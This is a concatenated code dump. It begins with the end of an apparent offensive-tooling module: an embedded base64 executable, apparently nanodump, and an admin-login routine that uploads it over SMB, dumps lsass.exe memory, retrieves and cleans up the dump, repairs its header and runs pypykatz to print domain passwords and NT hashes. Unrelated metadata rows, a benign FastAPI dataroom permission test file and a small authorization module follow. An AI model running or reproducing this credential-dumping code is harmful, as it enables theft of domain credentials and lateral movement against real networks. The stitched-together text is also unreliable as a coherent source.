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AAAAAAJgFTG9va3VwUHJpdmlsZWdlVmFsdWVXABsBRGVsZXRlQ3JpdGljYWxTZWN0aW9uAD8BRW50ZXJDcml0aWNhbFNlY3Rpb24AAHYCR2V0TGFzdEVycm9yAADMAkdldFByb2Nlc3NIZWFwAADnAkdldFN0YXJ0dXBJbmZvQQBfA0hlYXBBbGxvYwBlA0hlYXBGcmVlAAB8A0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb24AlwNJc0RCQ1NMZWFkQnl0ZUV4AADYA0xlYXZlQ3JpdGljYWxTZWN0aW9uAAAMBE11bHRpQnl0ZVRvV2lkZUNoYXIAcgVTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAggVTbGVlcAClBVRsc0dldFZhbHVlANQFVmlydHVhbFByb3RlY3QAANYFVmlydHVhbFF1ZXJ5AAALBldpZGVDaGFyVG9NdWx0aUJ5dGUAOABfX0Nfc3BlY2lmaWNfaGFuZGxlcgAAQABfX19sY19jb2RlcGFnZV9mdW5jAEMAX19fbWJfY3VyX21heF9mdW5jAABSAF9fZ2V0bWFpbmFyZ3MAUwBfX2luaXRlbnYAVABfX2lvYl9mdW5jAABbAF9fbGNvbnZfaW5pdAAAYQBfX3NldF9hcHBfdHlwZQAAYwBfX3NldHVzZXJtYXRoZXJyAAByAF9hY21kbG4AeQBfYW1zZ19leGl0AACLAF9jZXhpdAAAlwBfY29tbW9kZQAAvgBfZXJybm8AANwAX2Ztb2RlAAAdAV9pbml0dGVybQCDAV9sb2NrACkCX29uZXhpdAC1Al90aW1lNjQAygJfdW5sb2NrAAwDX3djc2ljbXAAAIoDYWJvcnQAlwNhdG9pAACbA2NhbGxvYwAAqANleGl0AAC8A2ZwcmludGYAvgNmcHV0YwDDA2ZyZWUAANADZndyaXRlAAD5A2xvY2FsZWNvbnYAAP8DbWFsbG9jAAACBG1ic3Rvd2NzAAAHBG1lbWNweQAACQRtZW1zZXQAABsEcmFuZAAAJwRzaWduYWwAADAEc3JhbmQAPARzdHJlcnJvcgAAPgRzdHJsZW4AAEEEc3RybmNtcABFBHN0cnJjaHIAYwR2ZnByaW50ZgAAeQR3Y3NjcHkAAH0Ed2NzbGVuAAB+BHdjc25jYXQAAAAAIAEAQURWQVBJMzIuZGxsAAAAABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAS0VSTkVMMzIuZGxsAAAAACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABAG1zdmNydC5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEEAAAAAAAIBCQAAAAAAAAAAAAAAAAAAAAAAAAAAAANBCQAAAAAAAoEJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")
self.nano = "nano.exe"
self.nano_path = "/tmp/shared/"
self.dir_result = self.nano_path
self.useembeded = True
if 'NANO_PATH' in module_options:
self.nano_path = module_options['NANO_PATH']
self.useembeded = False
if 'NANO_EXE_NAME' in module_options:
self.nano = module_options['NANO_EXE_NAME']
self.useembeded = False
if 'TMP_DIR' in module_options:
self.tmp_dir = module_options['TMP_DIR']
if 'DIR_RESULT' in module_options:
self.dir_result = module_options['DIR_RESULT']
def on_admin_login(self, context, connection):
if self.useembeded == True:
with open(self.nano_path + self.nano, 'wb') as nano:
nano.write(self.nano_embeded)
context.log.info('Copy {} to {}'.format(self.nano_path + self.nano, self.tmp_dir))
with open(self.nano_path + self.nano, 'rb') as nano:
try:
connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read)
context.log.success('Created file {} on the \\\\{}{}'.format(self.nano, self.share, self.tmp_share))
except Exception as e:
context.log.error('Error writing file to share {}: {}'.format(share, e))
# get pid lsass
command = 'tasklist /v /fo csv | findstr /i "lsass"'
context.log.info('Getting lsass PID {}'.format(command))
p = connection.execute(command, True)
pid = p.split(',')[1][1:-1]
command = self.tmp_dir + self.nano + ' --pid ' + pid + ' --write ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log'
context.log.info('Executing command {}'.format(command))
p = connection.execute(command, True)
context.log.debug(p)
dump = False
if 'Done' in p:
context.log.success('Process lsass.exe was successfully dumped')
dump = True
else:
context.log.error('Process lsass.exe error un dump, try with verbose')
if dump:
regex = r"([A-Za-z0-9]*-[A-Za-z]*[0-9]+-[A-Za-z0-9]*\.log)"
p = connection.execute("dir " + self.tmp_dir, True)
context.log.debug(p)
matches = re.search(regex, str(p), re.MULTILINE)
machine_name = ''
if matches:
machine_name = matches.group()
else:
context.log.info("Error getting the lsass.dmp file name")
sys.exit(1)
context.log.info('Copy {} to host'.format(machine_name))
with open(self.dir_result + machine_name, 'wb+') as dump_file:
try:
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.dir_result + machine_name))
except Exception as e:
context.log.error('Error while get file: {}'.format(e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + self.nano)
context.log.success('Deleted nano file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting nano file on share {}: {}'.format(self.share, e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
fh = open(self.dir_result + machine_name, "r+b")
fh.seek(0)
fh.write(b'\x4d\x44\x4d\x50')
fh.seek(4)
fh.write(b'\xa7\x93')
fh.seek(6)
fh.write(b'\x00\x00')
fh.close()
context.log.info("pypykatz lsa minidump {} --outfile {}.txt".format(self.dir_result + machine_name, self.dir_result + machine_name))
try:
context.log.info('Invoke pypykatz in order to extract the credentials ...')
os.system("pypykatz lsa minidump " + self.dir_result + machine_name + " --outfile " + self.dir_result + machine_name + ".txt >/dev/null 2>&1")
context.log.info("Extracted credentials:")
with open(self.dir_result + machine_name + ".txt", 'r') as outfile:
data = outfile.read()
regex = r"(?:username:? (?!NA)(?P<username>.+[^\$])\n.*domain(?:name)?:? (?P<domain>.+)\n)(?:.*password:? (?!None)(?P<password>.+)|.*\n.*NT: (?P<hash>.*))"
matches = re.finditer(regex, data, re.MULTILINE | re.IGNORECASE)
credz_bh = []
domain = ""
for match in matches:
domain = match.group("domain")
username = match.group("username")
password = match.group("password") or match.group("hash")
context.log.success(highlight(domain + "\\" + username + ":" + password))
if "." not in domain and domain.upper() in connection.domain.upper():
domain = connection.domain
credz_bh.append({'username': username.upper(), 'domain': domain.upper()})
if domain:
add_user_bh(credz_bh, domain, context.log, connection.config)
except Exception as e:
context.log.error('Error while execute pypykatz: {}'.format(e))
context.log.error('Please make sure pypykatz is installed (pip3 install pypykatz)')
| 572.183673 | 77,192 | 0.925896 | 2,624 | 84,111 | 29.647485 | 0.654345 | 0.003085 | 0.001671 | 0.001131 | 0.014371 | 0.011723 | 0.010001 | 0.005669 | 0.005399 | 0.003741 | 0 | 0.06769 | 0.025728 | 84,111 | 146 | 77,193 | 576.10274 | 0.881643 | 0.005814 | 0 | 0.155172 | 0 | 0.025862 | 0.939438 | 0.925925 | 0 | 1 | 0 | 0 | 0 | 1 | 0.017241 | false | 0.025862 | 0.051724 | 0 | 0.12069 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0621e456138e228f2308333bfbc0da1e2f13b8ea | 6,244 | py | Python | backend/app/tests/functional/test_datarooms.py | saschajullmann/sedotra | aaa38f6d533daa725a7037a8c446da978ffafa7d | [
"MIT"
] | null | null | null | backend/app/tests/functional/test_datarooms.py | saschajullmann/sedotra | aaa38f6d533daa725a7037a8c446da978ffafa7d | [
"MIT"
] | null | null | null | backend/app/tests/functional/test_datarooms.py | saschajullmann/sedotra | aaa38f6d533daa725a7037a8c446da978ffafa7d | [
"MIT"
] | null | null | null | import uuid
from fastapi.testclient import TestClient
from sqlalchemy.orm import Session
from app.core.config import settings
from app.models.dataroom_role import DataRoomRole
from tests.fixtures.role_data import Data
from tests.utils.auth_header import create_access_header
def test_get_rooms_in_org(
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking whether certain kinds of
users can access the the endpoint which lets one get a list of
all the datarooms in a given org.
"""
# Make sure a user who is a member of the org can list rooms
auth_header = create_access_header(data.member_user_org_1)
response = client.get(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms",
headers=auth_header,
)
assert response.status_code == 200
# Make sure the same user cannot access the list rooms endpoint
# for a random org.
rand_uuid = uuid.uuid4()
response = client.get(
f"{settings.API_V1_STR}/orgs/{rand_uuid}/datarooms",
headers=auth_header,
)
assert response.status_code == 404
# Make sure a guest user with only access to a specific room cannot
# access the list rooms endpoint for the entire org
auth_header = create_access_header(data.guest_read_user_room_1)
response = client.get(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms",
headers=auth_header,
)
assert response.status_code == 400
def test_create_room(
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking whether certain kinds of
users can create datarooms under a given org.
"""
# Make sure a user who is a member of the org can list rooms
auth_header = create_access_header(data.member_user_org_1)
new_room_request = {"name": "MyNewRoom", "description": "Band new description."}
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms",
headers=auth_header,
json=new_room_request,
)
assert response.status_code == 200
json_response = response.json()
assert "name" in json_response
assert "description" in json_response
assert "id" in json_response
# make sure that user from one org cannot create dataroom in a second org
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.second_org.id}/datarooms",
headers=auth_header,
json=new_room_request,
)
assert response.status_code == 403
def test_create_update_and_delete_room_user_roles(
db: Session,
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking the ability
to create, update and delete user roles for a dataroom
"""
auth_header = create_access_header(data.admin_user_room_1)
new_room_role_request = {
"user_id": str(data.member_user_2_org_1.id),
"user_role": "MEMBER",
}
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_1.id}/user_roles",
headers=auth_header,
json=new_room_role_request,
)
assert response.status_code == 201
role = (
db.query(DataRoomRole)
.filter_by(user_id=new_room_role_request["user_id"], dataroom_id=data.room_1.id)
.first()
)
assert role
assert role.name == new_room_role_request["user_role"]
update_room_role_request = {
"user_id": str(data.member_user_2_org_1.id),
"user_role": "ADMIN",
}
response = client.patch(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_1.id}/user_roles/{role.id}",
headers=auth_header,
json=update_room_role_request,
)
assert response.status_code == 200
role = (
db.query(DataRoomRole)
.filter_by(
user_id=update_room_role_request["user_id"], dataroom_id=data.room_1.id
)
.first()
)
assert role
assert role.name == update_room_role_request["user_role"]
response = client.delete(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_1.id}/user_roles/{role.id}",
headers=auth_header,
)
assert response.status_code == 200
def test_create_update_and_delete_room_team_roles(
db: Session,
client: TestClient,
data: Data,
) -> None:
"""
This test is responsible for checking the ability
to create, update and delete team roles for a dataroom
"""
auth_header = create_access_header(data.admin_user_room_2)
new_room_role_request = {
"team_id": str(data.team_1.id),
"team_role": "MEMBER",
}
response = client.post(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_2.id}/team_roles",
headers=auth_header,
json=new_room_role_request,
)
assert response.status_code == 201
role = (
db.query(DataRoomRole)
.filter_by(team_id=new_room_role_request["team_id"], dataroom_id=data.room_2.id)
.first()
)
assert role
assert role.name == new_room_role_request["team_role"]
update_room_role_request = {
"team_id": str(data.team_1.id),
"team_role": "ADMIN",
}
response = client.patch(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_2.id}/team_roles/{role.id}",
headers=auth_header,
json=update_room_role_request,
)
assert response.status_code == 200
role = (
db.query(DataRoomRole)
.filter_by(
team_id=update_room_role_request["team_id"], dataroom_id=data.room_2.id
)
.first()
)
assert role
assert role.name == update_room_role_request["team_role"]
response = client.delete(
f"{settings.API_V1_STR}/orgs/{data.first_org.id}/datarooms/{data.room_2.id}/team_roles/{role.id}",
headers=auth_header,
)
assert response.status_code == 200
role = (
db.query(DataRoomRole)
.filter_by(
team_id=update_room_role_request["team_id"], dataroom_id=data.room_2.id
)
.first()
)
assert role is None
| 27.030303 | 106 | 0.665599 | 866 | 6,244 | 4.531178 | 0.130485 | 0.043323 | 0.064985 | 0.039246 | 0.812946 | 0.80683 | 0.790265 | 0.756116 | 0.738022 | 0.728338 | 0 | 0.01397 | 0.231903 | 6,244 | 230 | 107 | 27.147826 | 0.804212 | 0.138533 | 0 | 0.594771 | 0 | 0.039216 | 0.195767 | 0.154384 | 0 | 0 | 0 | 0 | 0.150327 | 1 | 0.026144 | false | 0 | 0.045752 | 0 | 0.071895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
064d690452034468a919d9c59ad6be3f663872c9 | 170 | py | Python | navigator/auth/authorizations/__init__.py | phenobarbital/navigator-api | 15a0336b570ec861bdcc9c225e6f1b5684900a9d | [
"Apache-2.0",
"BSD-3-Clause"
] | 10 | 2020-07-27T03:33:20.000Z | 2022-02-18T21:25:49.000Z | navigator/auth/authorizations/__init__.py | webclinic017/navigator-api | d5844339c3127be77db0ee38aa7b833633e34075 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2020-09-07T15:20:54.000Z | 2021-05-28T00:56:45.000Z | navigator/auth/authorizations/__init__.py | webclinic017/navigator-api | d5844339c3127be77db0ee38aa7b833633e34075 | [
"Apache-2.0",
"BSD-3-Clause"
] | 3 | 2020-07-27T07:36:45.000Z | 2021-09-26T18:36:34.000Z | """Authorization Middlewares for Navigator."""
from .hosts import authz_hosts
from .allow_hosts import authz_allow_hosts
__all__ = ["authz_hosts", "authz_allow_hosts"]
